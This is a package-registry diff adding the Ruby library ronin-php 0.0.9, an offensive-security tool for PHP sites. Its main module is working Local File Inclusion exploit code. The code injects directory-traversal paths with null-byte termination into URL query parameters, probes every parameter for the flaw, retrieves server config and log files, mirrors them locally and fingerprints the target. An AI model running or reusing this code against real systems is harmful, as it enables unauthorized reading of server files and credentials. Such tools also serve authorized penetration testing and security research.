ronin-php 0.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
data/Rakefile ADDED
@@ -0,0 +1,19 @@
1
+ # -*- ruby -*-
2
+
3
+ require 'rubygems'
4
+ require 'hoe'
5
+ require './tasks/spec.rb'
6
+ require './tasks/static.rb'
7
+ require './lib/ronin/php/version.rb'
8
+
9
+ Hoe.new('ronin-php', Ronin::PHP::VERSION) do |p|
10
+ p.rubyforge_name = 'ronin'
11
+ p.developer('Postmodern Modulus III','postmodern.mod3@gmail.com')
12
+ p.extra_deps = [
13
+ ['ronin', '>=0.0.9'],
14
+ 'cssmin',
15
+ 'jsmin'
16
+ ]
17
+ end
18
+
19
+ # vim: syntax=Ruby
data/lib/ronin/php.rb ADDED
@@ -0,0 +1,27 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/extensions'
25
+ require 'ronin/php/lfi'
26
+ require 'ronin/php/rfi'
27
+ require 'ronin/rpc/php'
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/extensions/string'
@@ -0,0 +1,42 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ class String
25
+
26
+ #
27
+ # Returns +true+ if the String contains a PHP Warning message, returns
28
+ # +false+ otherwise.
29
+ #
30
+ def php_warning?
31
+ !((self =~ /<b>Warning<\/b>:\s+/).nil?)
32
+ end
33
+
34
+ #
35
+ # Returns +true+ if the String contains a PHP Error message, returns
36
+ # +false+ otherwise.
37
+ #
38
+ def php_error?
39
+ !((self =~ /<b>Fatal error<\/b>:\s+/).nil?)
40
+ end
41
+
42
+ end
@@ -0,0 +1,28 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions'
25
+ require 'ronin/php/lfi/extensions'
26
+ require 'ronin/php/lfi/target'
27
+ require 'ronin/php/lfi/file'
28
+ require 'ronin/php/lfi/lfi'
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions/unknown_target'
@@ -0,0 +1,31 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ module Ronin
25
+ module PHP
26
+ class LFI
27
+ class UnknownTarget < RuntimeError
28
+ end
29
+ end
30
+ end
31
+ end
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/extensions/uri'
@@ -0,0 +1,24 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/extensions/uri/http'
@@ -0,0 +1,58 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/lfi'
25
+
26
+ module URI
27
+ class HTTP < Generic
28
+
29
+ def test_lfi(options={})
30
+ up = ((options[:up]) || 0..Ronin::PHP::LFI::MAX_UP)
31
+ vulns = []
32
+
33
+ query_params.each_key do |param|
34
+ lfi = Ronin::PHP::LFI.new(self,param)
35
+
36
+ up.each do |n|
37
+ lfi.up = n
38
+
39
+ if lfi.vulnerable?(options)
40
+ vulns << lfi
41
+ break
42
+ end
43
+ end
44
+ end
45
+
46
+ return vulns
47
+ end
48
+
49
+ def lfi(options={})
50
+ test_lfi(options).first
51
+ end
52
+
53
+ def has_lfi?(options={})
54
+ !(test_lfi(options).empty?)
55
+ end
56
+
57
+ end
58
+ end
@@ -0,0 +1,86 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ module Ronin
25
+ module PHP
26
+ class LFI
27
+ class File < StringIO
28
+
29
+ # Path to the file
30
+ attr_reader :path
31
+
32
+ #
33
+ # Creates a new Inclusion with the specified _path_ and response
34
+ # _body_.
35
+ #
36
+ def initialize(path,body)
37
+ super(body)
38
+
39
+ @path = path
40
+ end
41
+
42
+ #
43
+ # Returns the contents of the File in String form.
44
+ #
45
+ def contents
46
+ string
47
+ end
48
+
49
+ #
50
+ # See contents.
51
+ #
52
+ def to_s
53
+ contents
54
+ end
55
+
56
+ def inspect
57
+ "#<#{self.class}:#{@path}>"
58
+ end
59
+
60
+ #
61
+ # Saves the body to specified _destination_, returns the
62
+ # _destination_.
63
+ #
64
+ def save(destination)
65
+ File.open(destination,'w') do |dest|
66
+ dest.write(string)
67
+ end
68
+
69
+ return destination
70
+ end
71
+
72
+ def mirror(base)
73
+ dest = File.join(base,@path)
74
+ dest_dir = File.dirname(dest)
75
+
76
+ unless File.directory?(dest_dir)
77
+ FileUtils.mkdir_p(dest_dir)
78
+ end
79
+
80
+ return save(dest)
81
+ end
82
+
83
+ end
84
+ end
85
+ end
86
+ end
@@ -0,0 +1,245 @@
1
+ #
2
+ #--
3
+ # Ronin PHP - A Ruby library for Ronin that provides support for PHP
4
+ # related security tasks.
5
+ #
6
+ # Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
7
+ #
8
+ # This program is free software; you can redistribute it and/or modify
9
+ # it under the terms of the GNU General Public License as published by
10
+ # the Free Software Foundation; either version 2 of the License, or
11
+ # (at your option) any later version.
12
+ #
13
+ # This program is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with this program; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ #++
22
+ #
23
+
24
+ require 'ronin/php/lfi/exceptions/unknown_target'
25
+ require 'ronin/php/lfi/target'
26
+ require 'ronin/php/lfi/file'
27
+ require 'ronin/extensions/uri'
28
+ require 'ronin/network/http'
29
+ require 'ronin/path'
30
+
31
+ module Ronin
32
+ module PHP
33
+ class LFI
34
+
35
+ # Maximum number of directories to escape
36
+ MAX_UP = 15
37
+
38
+ # The URL which is vulnerable
39
+ attr_reader :url
40
+
41
+ # The vulnerable query param
42
+ attr_accessor :param
43
+
44
+ # The path prefix
45
+ attr_accessor :prefix
46
+
47
+ # Number of directories to traverse up
48
+ attr_accessor :up
49
+
50
+ # Whether to terminate the LFI path with a null byte
51
+ attr_accessor :terminate
52
+
53
+ # Targeted Operating System (OS)
54
+ attr_accessor :os
55
+
56
+ #
57
+ # Creates a new LFI object with the specified _url_, _param_ and the
58
+ # given _options_. The specified _param_ indicates which query param
59
+ # in the _url_ is vulnerable to Local File Inclusion.
60
+ #
61
+ # _options_ may contain the following keys:
62
+ # <tt>:prefix</tt>:: The path prefix.
63
+ # <tt>:up</tt>:: The number of directories to transverse up. Defaults
64
+ # to 0.
65
+ # <tt>:terminate</tt>:: Whether or not to terminate the LFI path with
66
+ # a null byte. Defaults to +true+.
67
+ # <tt>:os</tt>:: The Operating System to target.
68
+ #
69
+ def initialize(url,param,options={})
70
+ @url = url
71
+ @param = param
72
+
73
+ @prefix = options[:prefix]
74
+ @up = (options[:up] || 0)
75
+
76
+ if options.has_key?(:terminate)
77
+ @terminate = options[:terminate]
78
+ else
79
+ @terminate = true
80
+ end
81
+
82
+ @os = options[:os]
83
+ end
84
+
85
+ #
86
+ # Returns +true+ if the LFI path will be terminated with a null byte,
87
+ # returns +false+ otherwise.
88
+ #
89
+ def terminate?
90
+ @terminate == true
91
+ end
92
+
93
+ #
94
+ # Builds a LFI url to include the specified _path_.
95
+ #
96
+ def url_for(path)
97
+ escape = (@prefix || Path.up(@up))
98
+ full_path = escape.join(path.to_s)
99
+ full_path = "#{full_path}\0" if terminate?
100
+
101
+ new_url = URI(@url.to_s)
102
+ new_url.query_params[@param.to_s] = full_path
103
+
104
+ return new_url
105
+ end
106
+
107
+ #
108
+ # Get the specified _path_ with the given _options_.
109
+ #
110
+ def get(path,options={})
111
+ options = options.merge(:url => url_for(path))
112
+
113
+ if options[:method] == :post
114
+ return Net.http_post_body(options)
115
+ else
116
+ return Net.http_get_body(options)
117
+ end
118
+ end
119
+
120
+ #
121
+ # Include the specified _path_ with the given _options_. Returns a
122
+ # new File object for the included _path_.
123
+ #
124
+ def include(path,options={})
125
+ File.new(path,get(path,options))
126
+ end
127
+
128
+ #
129
+ # Include a targeted file specified by _name_ using the given
130
+ # _options_. Returns a new File object for the included file.
131
+ # If a _block_ is given, it will be passed the newly created File
132
+ # object.
133
+ #
134
+ def include_target(name,options={},&block)
135
+ name = name.to_s
136
+ target = Target.with_file(name)
137
+
138
+ unless target
139
+ raise(UnknownTarget,"unknown target file #{name.dump}",caller)
140
+ end
141
+
142
+ return inclusion_of(target,options,&block)
143
+ end
144
+
145
+ def save_target(name,dest,options={})
146
+ include_target(name,options) do |file|
147
+ file.save(dest)
148
+ end
149
+ end
150
+
151
+ #
152
+ # Includes all targeted config and log files with the given _options_.
153
+ #
154
+ def include_targets(options={},&block)
155
+ (Target.configs + Target.logs).map { |target|
156
+ include_of(target,options,&block)
157
+ }.compact
158
+ end
159
+
160
+ #
161
+ # Mirrors all targeted config and log files to the specifed
162
+ # _directory_ using the given _options_.
163
+ #
164
+ def mirror_targets(directory,options={})
165
+ include_targets(options).map do |file|
166
+ file.mirror(directory)
167
+ end
168
+ end
169
+
170
+ #
171
+ # Returns +true+ if the url is vulnerable to LFI, returns +false+
172
+ # otherwise.
173
+ #
174
+ def vulnerable?(options={})
175
+ Target.tests.each do |target|
176
+ inclusion_of(target) do |file|
177
+ return true
178
+ end
179
+ end
180
+
181
+ return false
182
+ end
183
+
184
+ #
185
+ # Extracts information from all targeted files using the given
186
+ # _options_.
187
+ #
188
+ # _options_ may include the following options:
189
+ # <tt>:oses</tt>:: The Array of OSes to test for.
190
+ #
191
+ def fingerprint(options={})
192
+ data = {}
193
+
194
+ Target.with_extractors.each do |target|
195
+ inclusion_of(target,options) do |file|
196
+ data.merge!(target.extract_from(file.contents))
197
+ end
198
+ end
199
+
200
+ return data
201
+ end
202
+
203
+ #
204
+ # Returns the String form of the url.
205
+ #
206
+ def to_s
207
+ @url.to_s
208
+ end
209
+
210
+ protected
211
+
212
+ #
213
+ # Returns the available paths of the specified _target_.
214
+ #
215
+ def paths_of(target)
216
+ if @os
217
+ return target.paths_for(@os)
218
+ else
219
+ return target.all_paths
220
+ end
221
+ end
222
+
223
+ #
224
+ # Returns the File object obtained via the specified _target_
225
+ # and the given _options_. If a _block_ is given, it will be passed
226
+ # the new File object.
227
+ #
228
+ def inclusion_of(target,options={},&block)
229
+ paths_of(target).each do |path|
230
+ body = get(path,options)
231
+
232
+ if target.included_in?(body)
233
+ file = File.new(path,body)
234
+
235
+ block.call(file) if block
236
+ return file
237
+ end
238
+ end
239
+
240
+ return nil
241
+ end
242
+
243
+ end
244
+ end
245
+ end